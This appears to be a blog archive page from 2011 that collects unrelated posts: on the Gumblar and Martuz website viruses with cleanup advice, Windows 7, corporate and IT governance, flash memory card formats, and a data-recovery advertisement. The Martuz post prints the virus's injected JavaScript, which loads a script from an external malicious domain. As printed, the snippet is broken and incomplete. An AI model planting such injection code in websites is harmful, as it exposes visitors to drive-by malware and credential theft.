Saturday, December 31, 2011

Gumblar - another dangerous virus


With Conficker slowly but surely ceding its crown as the most talked about virus of 2009, Gumblar is steadily gaining attention as the new superstar virus. The Gumblar attack first relies on compromising normally legitimate website and planting malicious scripts. US CERT reports that stolen FTP credentials are reckoned to be the main technique in play during this stage of the attack but poor configuration settings and vulnerable web applications might also play a part. Surfers who visit compromised websites are exposed to attacks that rely on well-known PDF and Flash Player vulnerabilities to plant malware onto Windows PCs. This malware is designed to redirect Google search results as well as to swipe sensitive information from compromised machines, according to early findings from ongoing analysis.

Gumblar Aliases and Variants
Gumblar is also known as Troj/JSRedir-R. A recent variant is called Martuz.

Gumblar Summary

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

How To Remove Gumblar

The simplest way to remove Gumblar is to revert your website to a previous state. Or look through all your PHP, JS, HTML files and clean them manually. After that, reset your FTP credentials. The order is very important. Do not reset FTP credentials before cleaning the website, because this would only result in Gumblar stealing your new FTP password.


As domain was taken off the web, the Gumblar hackers came up with a new variant, Martuz. The new script now injects a new version that loads malicious content from a new domain –
The Martuz script code is below:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent; 
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
document.write('<script document.write('<script src='http://martu"+""+j+"><\/script>');}

Martuz Aliases and Variants

Martuz is a variant of Gumblar, which is also known as Troj/JSRedir-R

Martuz Summary

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

How To Remove Martuz

The simplest way to remove Martuz is to revert your website to a previous state. Or look through all your PHP, JS, HTML files and clean them manually. After that, reset your FTP credentials. The order is very important. Do not reset FTP credentials before cleaning the website, because this would only result in Gumblar stealing your new FTP password.

Friday, December 30, 2011

Windows 7 Size: Covering Two Scopes of OS Resizing

The engineers of Windows 7 have indicated that this version of operating system can be a minor release in the view of some users although it can be a major one for others. For now, these engineers have not yet identified whether the release of Windows 7 will be a minor or a major one. But they are suggesting now that it is something in between. Literally speaking though, Windows 7 size can flex from being minor to major. So, what is the meaning of this?

Simply, Windows 7 can snap its window to half or full the screen. This new operating system has the ability to resize any window to half or full the size of the monitor and bring it on the right or left pane of the screen. Apparently, this ability will give its user a useful drag-and-dropper.

In the previous released screencast, it is noticeable that dragging a window to the high point of the screen automatically maximizes it. Now, if a window will be dragged to the right or left side of the screen, user can recognize a glass display overlaying on the desktop. When the mouse button is released in this case, it will automatically snap the window on that overlay that is half of the screen's size. So this offers great convenience to those who own widescreen monitor.

However, when going beyond the literal meaning; Microsoft engineers noted that balance is the key when releasing any operating system, which definitely includes Windows 7. They claim that balance should be observed in order to make a major release, one that has better performance and seize the advantage brought by the latest technologies.

Meantime though, Windows 7 is not yet being classified as a major or minor release. Instead, this is termed as an "awesome release."

Thursday, December 29, 2011

Low Cost Data Recovery Services Fort Worth

Recover Lost Data in only for US$15, Flat rate. The lowest cost of data recovery you can find in Fort Worth and around the world.

Our low cost online data recovery service in Fort Worth has helped many people recover lost data in Fort Worth and around the world. The high cost of data recovery has leaded us to find way out to help people.

Online data recovery service has the experience and technical expertise to handle any type of data lost situation, such as accidentally delete your data, your hard disk partition suddenly lost cause by virus or system instability, your hard disk has been formatted or re-partition by other technicians and all your valuable data is gone, and many other logical problems.

Our data recovery services in Fort Worth have feature the industry’s most advanced recovery tools, proprietary techniques and the best expert in the business working to recover lost data

Online data recovery saves time and money because your files can be recovered in a matter of hours instead of days. Plus, recovering your data remotely can be done from the convenience of your office or home.

Contact our online data recovery expert for any inquiry and free consultation.

Taq: Data Recovery Services Fort Worth

Enterprise Governance – A Good and Bad Corporate Governance


Despite a proliferation of material, there is still much confusion surrounding this subject. Put in its simplest form, corporate governance is the systems and processes put in place to direct and control an organisation in order to increase performance and achieve sustainable shareholder value. As such, it concerns the effectiveness of management structures, including the role of directors, the sufficiency and reliability of corporate reporting, and the effectiveness of risk management systems.1 Where the confusion arises, however, is that corporate governance appears to embrace everything from budgeting to internal auditing, the role of non-executive directors to business ethics. It is very difficult therefore for finance professionals to define their changing responsibilities and ensure they are doing what is now expected of them.

In a joint in-depth survey of more than 300 CFOs and senior finance executives by CFO Research and Ernst & Young, nearly three-quarters ofrespondents said that better decision support was the main reason for improving their finance systems. Only half cited the need for better regulatory compliance.

In order to achieve good corporate governance a company must adopt a clear stance on each of the following:

• strategy

• stewardship

• corporate culture

• corporate reporting

• IT systems

• board operation.

There is plenty of evidence to show that if those pieces of the corporate governance jigsaw are not put together properly, the effectiveness of risk management systems across an organisation will prove inadequate.

The Good, the Bad and the Ugly - Examples of Corporate Governance

The Good: Unilever2

Unilever is one of the world's largest packaged consumer goods companies with more than 700 brands in its portfolio. Owned by Netherlands-based Unilever and

UK-based Unilever Plc, it operates as a single company, linked by equalisation agreements, which regulate the mutual rights of respective shareholders.

The company has grown to become a dominant force in the food, home and personal care markets, and is not only one of the largest ice-cream manufacturers, and the biggest producer of packet tea, but a world leader in deodorants, anti-perspirants and skin cleansers. It also operates a prestige fragrance business boasting designer brands to include Obsession, Eternity, CK One and CK Be.

It has made an impressive series of sales and acquisitions over the past ten years, to rationalise its operations and focus on core brands. Sales of these brands grew by more than 5 per cent in 2002. The company also took a number of its traditional brands into new markets.

As an organisation divided into two companies operating under two different sets of financial reporting regulations, there are obvious anomalies in corporate governance requirements. For example, the supervisory board as recognised in Holland is not known in the UK, neither are non-executive directors recognised in the Netherlands.

However, Unilever has created a governance structure often held up as an example of best practice. Advisory directors, as required under Dutch reporting regulations, act as non-executive directors, chosen for their broad experi­ence for an initial period of three to four years. All appointments and re-appointments are based on the recommendations of a Nomination Committee.

Board committees are divided into an executive, audit, corporate risk, external affairs, corporate relations, nomina­tion, remuneration and routine business committees.

Directors' service contracts, under Unilever's Articles of Association require all directors to retire from office at every AGM. Directors are expected to retire by their 62nd birthday.


The Good: General Electric3

In 2002, GE was ranked the world's second most admired company in the Fortune 500. Not only highly regarded for its financial services, GE is also involved in engineering, broadcast media, power generation and medical imaging.

Its good standard of governance has no doubt helped keep its stocks at such consistently high levels and contributed to its continued brand strength. When in 2002, the company faced intense investor scrutiny over earnings from its financial services operation, GE Capital, it resolved the situation by dividing GE Capital into commercial finance, consumer finance, equipment manage­ment and insurance. In the same year, GE also announced plans to further strengthen its governance standards to serve the long-term interests of its stakeholders.

The Bad: HIH

The problematic aspects of the corporate culture of HIH can be summarised succinctly. There was blind faith in a leadership that was ill equipped for the task. There was insufficient ability and independence of mind in and associated with the organisation to see what had to be done, and what had to be stopped or avoided. Risks were not properly identified and managed. Unpleasant informa­tion was hidden, filtered or sanitised. And there was a lack of sceptical questioning and analysis when and where it mattered.

(Royal Commission on the collapse of the Australian insurance company HIH)4

The Ugly: Boeing5

In December 2003, Boeing, one ofthe world's most famous aerospace companies, found itselfcaught up in a scandal that was to see its CFO sacked and its CEO resign - albeit not as a 'direct consequence' of the scandal.

The scandal followed investigations by a number of military and civilian departments into allegations that Boeing acted improperly in the $18bn sale of 100 Boeing 767 tankers to the United States Air Force (USAF).

The firm had already been rocked by a similar 'unethical practices' scandal involving the possession of documents belonging to rival Lockheed Martin during bidding for a military rocket-launch contract in 1998. As a result of the allegation the Pentagon subsequently suspended Boeing from bidding on future rocket contracts pending a review of its practices. Lockheed Martin sued Boeing for alleged theft.

Alleged accounting irregularities surrounding the acqui­sition of McDonnell Douglas cost the company $92.5m after shareholders accused the then CEO Phil Condit of using accounting tricks to massage the company's financial health. In 2003, Boeing paid out more than $1bn in deal-related write-offs.

Alleged Unethical Practice

In February 2001, Boeing, already feeling the corporate pinch, bid to supply the USAF with re-engineered 767s for a price tag of $124.5m each. Although the proposition was initially well received, research later showed that the air force did not need any new tankers until 2010.

The terrorist attacks of September 11 brought about more financial misery for Boeing as airlines worldwide reduced the number of flights. Shortly after the world-stopping events, Boeing laid off around 30 per cent of its commercial aviation workforce. By 2002, it had also scrapped plans for a new faster, smaller long-range aircraft - the Sonic Cruiser.

A short-lived turnaround followed, with the announce­ment of a $9bn deal to supply Ryanair with 100 new aircraft, and a $9.7bn deal with the USAF for transport aircraft. However, the run of good luck was brought to a halt when strike action threatened to halt production.

But in 2003, the Washington Post broke an article alleging that Boeing executives had met with USAF official Darleen Druyun, who, it was alleged, had provided bid details to Boeing. It was also alleged that she suggested ways of finding the money to fund the deal through a leasing agreement.

Druyun then entered discussion to join Boeing in October 2002, but continued to work on the deal for the USAF until November. She then officially joined Boeing in early 2003. Following the story, Boeing publicly defended itself, publishing a number of articles in leading US newspaper titles. But the scandal still persisted.

According to a Wall Street Journal report, Boeing had committed $20m to Trieme Partners, a firm set up by Richard Perle, a key political ally of the Pentagon's right-wing leadership, who had long supported the Boeing/ USAF deal. It was alleged that articles written by him supporting the deal were ghost written, as were a number of other articles by leading military figures, who later became Boeing consultants.

As the scandal deepened, CEO Condit fired his CFO Michael Sears. Druyun was the next to go. Condit's resignation was alleged not to be 'related to the scandal', but opinion to the contrary persists.

Former vice-chairman of the Boeing board, Harry Stonecipher, came out of retirement to replace Condit in

December 2003. He maintained that in spite of the controversy the tanker deal would remain on the table.

Market Position

In 2002, commercial aircraft accounted for 52 per cent of Boeing's sales. By 2003, its 70 per cent market share had dropped to 50 per cent with fewer than 300 planes delivered. Boeing spent more than 10 to 20 per cent more on building costs than its main rival Airbus.

Shortly before Thanksgiving 2003, aircraft manufacturer Boeing fired CFO Michael Sears and vice-president Darleen A. Druyun after an internal investigation alleged that Sears personally lobbied to hire Druyun in late 2002 while she worked for the Air Force - with whom Boeing was negotiating a $21 billion contract. A week later, Boeing CEO Phil Condit resigned as well, just as book reviewers received their copies of Soaring Through Turbulence: A New Model for Managers Who Want to Succeed in a Changing Business World - a primer on ethical business management by former Boeing CFO Michael Sears.6

How Flash Memory Works

Flash memory is a type of nonvolatile memory that is divided into blocks, rather than bytes as with normal RAM memory modules. Flash memory, which also is used in computers for BIOS chips, is changed by a process known as Fowler-Nordheim tunneling. This process removes the charge from the floating gate associated with each memory cell. Flash memory then must be erased before it can be charged with new data.

The speed, low reprogramming current requirements, and compact size of flash memory devices have made flash memory a perfect counterpart for portable devices such as laptop computers and digital cameras, which often refer to flash memory devices as so-called "digital film." Unlike real film, digital film can be erased and reshot. Ultra-compact, USB-based keychain drives that use flash memory have quickly replacedboth traditional floppy drives and Zip/SuperDisk drives for transporting data between systems.

Types of Flash Memory Devices

Several types of flash memory devices are in common use today, and it's important to know which ones your digital camera is designed to use. The major types include the following:

  • ATA Flash

  • CompactFlash (CF)

  • SmartMedia (SM)

  • MultiMediaCards (MMC)

  • Reduced Size MMC (RS-MMC)

  • SecureDigital (SD)

  • Memory Stick

  • xD-Picture Card

  • Thumb or keychain USB devices

Table below shows the different types of solid-state storage used in digital cameras and other devices, listed in order of physical size.

Table; Different Flash Memory Devices and Physical Sizes

TypeL (mm)W (mm)H (mm)Volume (cc)Date Introduced
ATA Flash Type II54.0085.605.0023.11Nov. 1992
ATA Flash Type I54.0085.603.3015.25Nov. 1992
CompactFlash (CF) Type II42.8036.405.007.79Mar. 1998
CompactFlash (CF) Type I42.8036.403.305.14Oct. 1995
Memory Stick21.4550.002.803.00Jul. 1998
Secure Digital (SD)24.0032.002.101.61Aug. 1999
SmartMedia (SM)37.0045.000.761.27Apr. 1996
MultiMediaCard (MMC)24.0032.001.401.08Nov. 1997
xD-Picture Card (xD)20.0025.001.700.85Jul. 2002
Reduced Size MMC (RS-MMC)24.0018.001.400.60Nov. 2002
Note: USB flash drives are not listed because they do not have a standardized form factor.


CompactFlash, developed by SanDisk Corporation in 1994, uses ATA architecture to emulate a disk drive; a CompactFlash device attached to a computer has a disk drive letter just like your other drives. The original size was Type I (3.3mm thick); a newer Type II size (5mm thick) accommodates higher-capacity devices. Both CompactFlash cards are 1.433" wide by 1.685" long, and adapters allow them to be inserted into laptop computer PC Card slots. The CompactFlash Association ( oversees development of the standard.


Ironically, SmartMedia (originally known as SSFDC for solid state floppy disk card) is the simplest of any flash memory device. A SmartMedia card contains only flash memory on a card without any control circuits. This simplicity means that compatibility with different generations of SmartMedia cards can require manufacturer upgrades of SmartMedia-using devices.


The MultiMediaCard (MMC) was co-developed by SanDisk and Infineon Technologies AG (formerly Siemens AG) in November 1997 for use with smart phones, MP3 players, digital cameras, and camcorders. The MMC uses a simple 7-pin serial interface to devices and contains low-voltage flash memory. The MultiMediaCard Association ( was founded in 1998 to promote the MMC standard and aid development of new products. In November 2002, MMCA announced the development of the Reduced Size MultiMediaCard (RS-MMC), which reduces the size of the standard MMC by about 40% and can be adapted for use with standard MMC devices.


A SecureDigital (SD) storage device is essentially an improved and updated version of MMC, and MMC cards can be read in SD slots. SD has several enhancements over MMC and is available in greater capacities. SD, which was co-developed by Toshiba, Matsushita Electric (Panasonic), and SanDisk in 1999, gets its name from two special features. The first is encrypted storage of data for additional security, meeting current and future SecureDigital Music Initiative (SDMI) standards for portable devices. The second is a mechanical write-protection switch. The SD slot can also be used for adding memory to Palm PDAs. The SDIO standard was created in January 2002 to enable SD slots to be used for small digital cameras and other types of expansion with various brands of PDAs and other devices. The SD Card Association ( was established in 2000 to promote the SD standard and aid the development of new products.

Sony Memory Stick and Memory Stick Pro

Sony, which is heavily involved in both laptop computers and a wide variety of digital cameras and camcorder products, has its own proprietary version of flash memory known as the Sony Memory Stick. These devices feature an erase-protection switch, which prevents accidental erasure of your photographs. Sony has also licensed Memory Stick technology to other companies, such as Lexar Media.

Lexar introduced the enhanced Memory Stick PRO in 2003, with capacities ranging from 256MB up to 1GB. Memory Stick Pro includes MagicGate encryption technology, which enables digital rights management, and Lexar's proprietary high-speed memory controller.

ATA Flash PC Card

Although the PC Card (PCMCIA) form factor is now used for everything from game adapters to modems, from SCSI interfacing to network cards, its original use was computer memory, as the old PCMCIA (Personal Computer Memory Card International Association) acronym indicated.

Unlike normal RAM modules, PC Card memory acts like a disk drive, using the PCMCIA ATA (AT Attachment) standard. PC Cards come in three thicknesses (Type I is 3.3mm, Type II is 5mm, and Type III is 10.5mm), but all are 3.3" long by 2.13" wide. Type I and Type II cards are used for ATA-compliant flash memory and the newest ATA-compliant hard disks. Type III cards are used for older ATA-compliant hard disks; a Type III slot also can be used as two Type II slots.

xD-Picture Card

In July 2002, Olympus and Fujifilm, the major supporters of the SmartMedia flash memory standard for digital cameras, announced the xD-Picture Card as a much smaller, more durable replacement for SmartMedia. In addition to being about one-third the size of SmartMediamaking it the smallest flash memory format yetthe xD-Picture Card has a faster controller to enable faster image capture.

Initial capacities range from 16MB up to 128MB, but eventual capacities are expected to reach up to 1GB or above. The 16MB and 32MB cards (commonly packaged with cameras) record data at speeds of 1.3MBps, whereas the 64MB and larger cards record data at 3MBps. The read speed for all sizes is 5MBps. The media are manufactured for Olympus and Fujifilm by Toshiba, and because xD-Picture media are optimized for the differences in the cameras (Olympus's media support the panorama mode found in some Olympus xD-Picture cameras, for example), you should use the same brand of camera and media.

USB Keychain Drives (Thumbdrives)

As an alternative to floppy and Zip/SuperDisk-class removable-media drives, USB-based flash memory devices are rapidly becoming the preferred way to move data between systems. The first successful drive of this typeTrek's ThumbDrivewas introduced in 2000 and has spawned many imitators, including many that incorporate a keychain or pocket clip to emphasize their portability.

Unlike other types of flash memory, USB keychain drives don't require a separate card reader; they can be plugged into any USB port or hub. Although a driver is usually required for Windows 98 and Windows 98SE, most USB keychain drives can be read immediately by newer versions of Windows, particularly Windows XP. As with other types of flash memory, USB keychain drives are assigned a drive letter when connected to the computer. Most have capacities ranging from 32MB to 128MB, with some capacities as high as 2GB. However, typical performance with USB 2.0 is about 5MBps.

E-Business IT Governance and Business Rational

Governance is a multifaceted activity requiring the efficient and effective uses of resources to achieve desired aims. In e-business IT Governance it is the ability to manage IT, develop strategies, and create systems that are relevant to business operations and customers who interface with an organisation. IT Governance involves building a professional IT capability that is able to offer a business strategic advantages. The professional IT executive needs to work closely with business executives to determine how IT can add value. The value contribution of IT can be determined by considering facets of global e-business IT Governance such as:
    Develop an IT strategy, and undertake critical strategic and operational reviews. Strategy formulation requires an imagination to use IT capability to build better relationships with partners, customers and employees. 
  • Develop and manage the distributed IT/IS systems, e-crm and e-technology infrastructures. 

  • Ensure that business-critical projects are completed. 

  • Define methods, tools, and processes. 

  • Define best practices. 

  • Manage application development. 

  • Manage outsourced providers and multi-site procurement policies. 

  • Ensure effective IT services delivery strategy to business segments that lead to internal productivity gains. 

  • Develop key performance indicators. 

  • Critically review current organisation structures and capability and implement cost savings to improve efficiency and effectiveness. 

Underlying all the above activities is the aim of meeting operating needs of a company. Any IT Governance mechanism should be rooted in business logic. For global companies with e-business aspirations, three segments of business need to be considered: marketing, human factors, and business-to-business relations. In terms of marketing, a company needs to consider how its e-business strategy supports its overall mission and communications objectives. It needs to develop a one-to-one marketing strategy over the Internet for customers and the extranet business partners. It needs to determine how to relate digitally with its customers. In terms of human factors, a company needs to assess how its customers will respond to digitised interaction. E-crm strategies need to be customer-focused and, as explained in the following section, appropriate customer-organisation interaction models need to be developed. This may require developing easy-to-use interfaces for customers who are simply interested in purchasing items or services. Finally, in terms of business-to-business, a company will need to assess how to develop the interaction between itself and its business partners and suppliers.

Most e-business models tend to overlook the customer as an integral aspect of an e-business. E-business IT Governance needs to be customer-centric. The customer is regarded as an operational aspect of e-business in the framework presented later. No physical boundaries exist between a business and its partners, suppliers or investors, or between a business and its customers in an e-business. Business processes that deliver a product or service now extend virtually to the customer. Dell, the personal computer manufacturer, produces customised products through its corporate portal, linking its operational process directly to the customer. Thus both suppliers and business partners, and critically, customers, now become operational issues in e-business enterprises and e-business IT Governance. Business processes that link directly to customer requirements mean that IT Governance too needs to consider the company's customer in its systems development approaches and strategies. and Yahoo! are examples of companies that operate beyond notions of business transformation; they are truly networked organisations that are superimposed on transient physical and organisational structures. The role of IT Governance in such organisations is beyond the simple management of the IT tool. It involves ensuring the very economic viability of a company.
Some Radical Re-Directions in E-Business IT GovernanceThe e-business IT Governance framework elaborated in the following section is built on radical re-directions from traditional IT Governance. E-business is the integration of economic, business and technology aspects of business activity. The scope of e-business IT Governance is not now simply inward IT management but outward relations, covering business partners, suppliers, and critically, customers. Traditional IT Governance focused on the technology and its application to business operations, whereas e-business IT Governance is intertwined with business and economic management, with suppliers, business partners and customers. In e-business, IT Governance has thus moved onto a different plane, requiring fundamental re-directions discussed below that need to be considered for effective global e-business IT Governance. 

Traditional IT Governance's modus operandi is planning. In global e-business IT Governance it is necessary to consider both planned e-business IT and emergent requirements. Modern organisations cannot be viewed solely as planned and directed entities. Organisational life is about 'being in the process' and not only about definable structures, especially when considering the virtuality of organisation structures. There is evidence that organisation structure is dynamic. In terms of IS development, research reveals that developers need to consider the emergent information and knowledge needs of the organisation (Baskerville, Travis, & Truex, 1992) in such organic structures. Similarly, strategies should be free to appear at any time and in any place in the organisation. There is a 'messy process of informal learning' through which strategies may be formulated. Planning itself needs to be of the rolling wave kind to cater for uncertainty and, possibly, contractual work in systems development.

IS development needs to be re-scoped to include customers, business partners, and suppliers. For e-business, IS development is not simply an 'internal' problem as in traditional IT Governance. In e-business it extends outside the organisation to include business partners and suppliers, but most critically it needs to include customers. Pure e-business organisation is directly linked to its customers through the Internet. Its business processes and operations are driven by this direct interface. As the interface is enabled by IT, its development and the development of associated systems needs to involve all interfaces. Thus the very problem of systems development extends outside the organisation.

Consequently, e-business IT Governance is about developing new interfaces to fundamentally change the way in which an organisation interacts with its customers, partners and suppliers. The new interfaces are between:
    Customer — organisation 
  • Partner — organisation 

  • Supplier — organisation 

These interfaces are vital for the viability of a company and pose a new problem for global IT Governance. The problem is how to design efficient business processes that extend to interfaces as well as the interface itself. In some virtual organisation forms the customer is a co-producer of the goods or services; for example, where the buyer of cars or personal computers can customise the requirement for a product online. For the customer-organisation interface, one aspect of the problem is how to design interfaces that cater for cultural diversity to be found globally. These interfaces cover both process issues and its fused IT. The customer-organisation interface should be monitored to extract vital business intelligence from customers.

There are various reasons why all systems requirements cannot be known in advance to facilitate detailed IT plans and development. The users may not know what is required, or if they do they may not be able to explain or express the problem in terms that are readily understandable and can be modelled. Therefore global e-business IT Governance needs to develop local information and Knowledge Management tools. Global businesses will need to devise and implement varying marketing strategies for local needs. Web-based marketing systems require incorporating customising or tailoring tools to allow different product promotions or application tailoring (Wolfgang et al., 1998).

Historically, the level of sophistication of tools in a society reflects its intelligent activity. It is not possible to achieve an objective without some kind of tools or devised method. A tool is a 'wholly constructed expression of both knowledge and values' (Groth, 1999). Interestingly, there has been a paucity of tools in IS given its pervasiveness in organisations and, during the last decade, in society generally. E-business tools contribute to organisation structure, its effectiveness and efficiency. Tool building that facilitates the collective experiences of individuals leads to the design of better and effective tools, as it leads to the design of sophisticated and precise tools that solve the problem at hand.

Traditional technology has not had an all-encompassing effect on organisation structure and communication. Traditional IT Governance has not had to deal with questions of organisation structure, except with the notion of business transformation. E-business IT Governance by necessity has to consider the all-encompassing effect that the new networking digital technologies have on organisation. Internet and web technologies enable organising virtually. Policies need to be developed to enable organising virtually, as well as:

    Developing and enable virtual structures, which by definition will change; 
  • Ensuring economic viability, not simple business 'fit'; 

  • Developing solutions that are valid at corporate and business unit levels. 

E-business IT Governance is more complex than the traditional alignment of IT with business or deriving business opportunity from IT. It is about integrating IT into the very business, referred to here as fusing IT with business. An e-business should be regarded as an open-ended organisational network. The notion of open systems (Flood & Jackson, 1991) may be one way of conceptualising such an entity. Another way to think about open-ended organisational networks is as 'webs' (Patel, 2001a). The empirically founded web concept is proposed as a conceptual tool to develop applications better suited for business organisations dealing in information and knowledge with emergent needs. It is consistent with the major content of e-business technology, namely information and knowledge processing, and with the plank of information and knowledge ontology within the proposed framework.

Develop ontologies of information and knowledge that are not simple data/information processing algorithms. A significant aspect of e-business IT Governance that is different from traditional IT Governance concerns business intelligence and models of customers. E-business solutions require intricate models of customer behaviour. The various applications need to be integrated to provide a unified view of customers.

Two other radical considerations are cross-organisational IS development teams and reconceptualising time and space in a virtual e-business organisation. Lee (1999) describes temporal changes of export related work in companies using EDI and how IS create temporal symmetry. International businesses have given rise to global and virtual software development teams. These teams are composed of North American and European corporations and companies from the Indian subcontinent. The management of virtual software development teams is a new challenge for e-business IT Governance. 

Wednesday, December 28, 2011

Does Developing Mobile Application Need Responsibility?

Mobile applications are without a doubt a blessing to most mobile phone users. Mobile applications have enhanced their mobile phone use through the years. Because of mobile applications there are many things one can do through his mobile phone.

Instead of calling the people he needs to talk to, one can send text messages too. Now one can even send and receive emails. If one needs to surf the internet, he can do so too. For the busy people who go home late at night, they can catch their favorite shows on their phone too. The younger set who are very fond of games can play to their heart's content too.

With such a demand for mobile applications, developers and especially vendors have made them available for sale. Aside from the ones that phone manufacturers and service providers provide for free, one can now avail additional mobile applications for a fee.

There are actually a lot of people who buy mobile applica-tions. In order to gain additional games, teens and even young professionals buy them. Other applications for business and even for sports are also patronized by many.

Because of the high demand, the number of new mobile applications popping up almost every day or every week is just great. One thing has been observed though. Many of these appli-cations seem to be hurriedly made. Almost of none them is even really a necessity or a "must have" application. This is not to discount the fact that many are useful though. It's just there are

just more mobile applications that seem to be there just for the sales. People can't just help but ask, "Shouldn't developing mobile application require responsibility on the part of the developers and the vendors who sell them?"

Enterprise Governance – Internal Evaluation


An organisation's ability to evaluate the value of its products and customers, in terms of their contribution to the overall stakeholder and shareholder value of the business, is critical to its competitiveness and long-term success. But as the volume and value of information from these processes grow, so too does the complexity associated with managing company performance. Yet all too often, we see finance professionals resorting to self-built spreadsheet-based systems for consolidation, budgeting, and reporting and analysis, which do not deliver real-time analysis or the flexibility needed by organisations in today's economic and political climates. In effect, the finance function is failing to effectively support strategy.

Historically, financial information has been extracted from different legacy systems and spreadsheets, and then presented neatly summarised to senior executives. To achieve this, the finance function at corporate or business unit level often spends a large part of the monthly close manually cleaning the data from different operating sites and systems, invariably creating multiple versions of the truth (Figure 4.1). The information produced,clip_image002

which is often of poor quality and plagued by inconsistent data from different sources, is then supplemented with yet more information and forecast data from other sources, often outside of the organisation (Figure 4.2). Tight reporting deadlines typically lead to a situation where there is very little time for value-added analysis of business performance.

The problem is exacerbated when the executive committee requests one-off or ad hoc analysis of a particular issue such as declining sales in a particular market. This inevitably leads to additional extract programmes and spreadsheet analysis. As a result, the staff in such decision-support roles often complain about the burden of manual, menial work which incompatible systems place on them.

For an organisation to successfully achieve its objectives, management must understand where value is created and destroyed and whether its business model is operating effectively and how this can be improved. This is done by defining and evaluating the strategy, setting targets, measuring performance, forecasting and then re-evaluating the strategy. All ofthis requiresclip_image004

a vital ingredient — information. Crucially, that information must be timely, accurate and consistent across the organisation.

Unfortunately many organisations' reporting systems and decision-support capability are rooted in the 1980s. Our work with organisations around the world has highlighted a large number ofshortcomings in existing approaches and confirms that finance professionals continually struggle to provide the value-added strategic decision support which senior executives require. These shortcomings include the following:

• There is a lack of strategic focus on competitors, customers and products and the failure to address the information needs of the wider stakeholder groups.

• There is an absence of a 'balanced scorecard' or related approach for linking strategy to operational activities. This results in a focus on mainly historical financial measures of performance.

• Reporting under traditional legacy systems is cyclical in nature and often restricted to month-end reporting.

• In many cases, IT is a constraint on the firm's ability to implement new reporting processes and measures.

• Important business knowledge and understanding of the underlying processes are often embedded in poorly docu­mented, stand-alone spreadsheets.

• With business models and corporate strategies continually changing, many firms find that their reporting systems do not reflect the changing corporate strategy.

• There is too much focus on information for tracking and control purposes; poor support for planning, direction setting and forecasting.

• The strong financial accounting bias in many management reporting systems often leads to a lack offocus on the drivers of performance and in particular the customer-facing revenue creation processes.

Traditional performance measures also try to quantify perfor­mance and other improvement efforts in financial terms. However, most improvement efforts are difficult to quantify in currency (i.e. lead time reduction, adherence to delivery schedule, customer satisfaction and product quality). As a result, traditional performance measures are often ignored in practice at the 'sharp end' ofthe business — the factory shop floor or client-facing levels. Traditional financial reports are also incredibly inflexible in that they have a pre-determined format which is used across all departments. This ignores the fact that even departments within the same company have their own characteristics and priorities. Thus, performance measures that are used in one department may not be relevant for others.

As a result, corporations often find that their strategic decisions are not converted into the operational objectives ofthe business, and that the strategic decisions are not understood or optimised at all levels. Strategy, therefore, has to move out of the executive office and be integrated into the day-to-day work of each employee. The employee can then contribute to making strategy happen and can provide feedback for further optimisation of the strategy. Only then can an enterprise really align its entire activities with the value expectations of the shareholders and other stakeholders (employees, business partners, customers, public interest groups), and thus ensure long-term profitability.

Planned and Emergent IT Governance in Action

 The value of the proposed framework for management action is illustrated briefly with a case in this section. The case is of a contract supplier of toiletries and pharmaceuticals liquids. In five years a strategic vision became blurred and threatened to send the company's finances into a black hole. The introduction of IT and IS was nontrivial as the company discovered its cost. This case describes the unexpected long introduction, over five years, of IT into the company. It demonstrates the complexities and high costs of realising a global strategic information system. 

The company wanted to improve its supply chain management and its associated information. Its high overheads, relative to its competitors, led to a decline in its market share. It wanted to use IT to make its supply chain efficient and automate the information associated with the supply chain. The management believed that IT would help them make their supply chain operations into 'real-time'. This was required because of the increasingly complex processes involved in delivering products to customers on time.

The company introduced its strategic IS in 1997. It was to 'compute' complex planning and scheduling scenarios across some 500-plus Shop Keeping Units. Purchasing was struggling to manage the component range; Material Requirements Planning would enable them to control requirements more systematically. It was sourced from a company that already had a wide customer base, which provided the management with confidence to purchase the software. They were also confident in the consultant who was to install the system into the company.

The supply chain information system was installed in 1997 and failed to deliver the benefits expected. The company abandoned it in 1999. They relaunched a tailored version of it in 2002 with the same objectives as in 1997. The company has lost five years of real progress in IT/IS usage. Five years later, the chairman of the company admitted that it had vastly underestimated the costs associated with introducing IT/IS and that they are still suffering the consequences today. Fortunately, the company's cost management was robust for it to 'enjoy good margins', which enabled it to survive 'whereas lesser companies may have gone to the wall'.

The company is a successful example of the value that IT/IS could add to its operations and help it gain competitive advantage. What went wrong? Why did its strategic plans fail? The case illustrates that plans alone were not sufficient. Although the company had not deployed formal strategic IT/IS planning tools such as portfolio analysis, it had a clear vision and plan to introduce IT/IS into its operations. As the production manager observed, planning alone could not account for the complex and emerging environment in which the IT/IS was introduced. The initial introduction and subsequent reintroduction is a case of an emerging strategy for e-business IT Governance. 

Tuesday, December 27, 2011

IT GOVERNANCE COURSE 6: Best Practices, Why the board need it?

Generally, best practices are techniques and approaches that have been proven to provide a desired result. In IT governance, best practices are designed to align IT and the organization’s objectives. IT governance best practices require the company to meet two specific goals:

  • Align the goals of IT to the goals of the company, Both must be focused on and working for the common good of the company.

  • Establish accountability, Accountability requires that individuals be held responsible for their actions. Accountability can be seen as a pyramid of responsibility that starts with the lowest level of employees and builds itself up to top management.

Alignment requires strategy, or the path that the company will use to move from overall policy and goals to delivery of product, accounting, and audit. Figure 2.1 depicts an example of this goal alignment.

Senior management’s role in this process comes at a strategic level, not a tactical one. Consider eBay as an example. Although eBay’s senior management is very concerned about merchandise being listed for the duration of an auction and about bidding and closing occurring seamlessly, they should have little concern about the operating system and platform. As long as the technology can meet the stated business goal, the choice of Windows, Linux, or UNIX should be left up to the IT department.

Senior management’s goal is to ensure that goals are aligned, IT is tasked with meeting those business needs, and the auditor is responsible for ensuring that controls are present and operating effectively.

Only Today Install GRT Recover My Files for Free as in Freeware "GRT Recover My File is fast and easy-to-use data recovery solution. No technical or data recovery skills are required to undelete your files.
GRT Recover My File tool helps you to recover lost files from FAT16, FAT32 and NTFS"


Who wants my data? - a case of data theft
There's a company which does 100% of its business online. It specialises in providing online services, so its IT systems and their security are of considerable importance. As any big company (4,000+ employees, several sites and branches worldwide) would do, they have a PR department that also follows up on Internet gossip, on what is going on in the chat rooms provided by the company, and in relevant online forums. This turned out to be a very wise move as, one lovely July day, a message popped up in one of these forums, which froze the blood of the head of PR.
